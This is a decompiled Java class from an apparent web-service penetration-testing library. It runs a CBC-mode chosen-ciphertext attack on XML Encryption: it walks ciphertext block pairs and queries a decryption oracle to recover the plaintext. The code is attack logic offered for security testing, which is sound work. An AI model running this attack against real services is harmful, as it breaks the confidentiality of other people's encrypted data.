/*
 * Decompiled with CFR 0.152.
 */
package wsattacker.library.xmlencryptionattack.attackengine.attacker.cbc;

import java.util.Arrays;
import wsattacker.library.xmlencryptionattack.attackengine.attackbase.CCAAttack;
import wsattacker.library.xmlencryptionattack.attackengine.attacker.cbc.FindIVMethodProperties;
import wsattacker.library.xmlencryptionattack.attackengine.attacker.cbc.FindIVMethodSimple;
import wsattacker.library.xmlencryptionattack.attackengine.oracle.base.AOracle;
import wsattacker.library.xmlencryptionattack.util.XMLEncryptionConstants;

public class CBCAttacker
extends CCAAttack {
    private final byte[] encryptedData;
    private final int blockSize;

    public CBCAttacker(byte[] encryptedData, AOracle oracle, int blockSize) {
        this.m_CryptoTechnique = XMLEncryptionConstants.CryptoTechnique.SYMMETRIC;
        this.encryptedData = (byte[])encryptedData.clone();
        this.m_Oracle = oracle;
        this.blockSize = blockSize;
    }

    @Override
    public byte[] executeAttack() {
        byte[] paddedDecryptedData = new byte[this.encryptedData.length - this.blockSize];
        int lastBlockLength = 0;
        int blockPairNumber = this.encryptedData.length / this.blockSize - 1;
        FindIVMethodProperties.Type type = FindIVMethodProperties.Type.UNDEFINED;
        for (int i = 0; i < blockPairNumber; ++i) {
            boolean processingLastBlock = i == blockPairNumber - 1;
            int start = i * this.blockSize;
            byte[] iv = Arrays.copyOfRange(this.encryptedData, start, start + this.blockSize);
            byte[] c1 = Arrays.copyOfRange(this.encryptedData, start + this.blockSize, start + 2 * this.blockSize);
            FindIVMethodSimple fim = new FindIVMethodSimple(this.m_Oracle, iv, c1, processingLastBlock, type);
            byte[] decrypted = fim.executeAttack();
            System.arraycopy(decrypted, 0, paddedDecryptedData, start, decrypted.length);
            lastBlockLength = decrypted.length;
            if (type != FindIVMethodProperties.Type.UNDEFINED) continue;
            type = fim.getProperties().getType();
        }
        int resultLength = paddedDecryptedData.length - this.blockSize + lastBlockLength;
        byte[] result = Arrays.copyOf(paddedDecryptedData, resultLength);
        return result;
    }
}

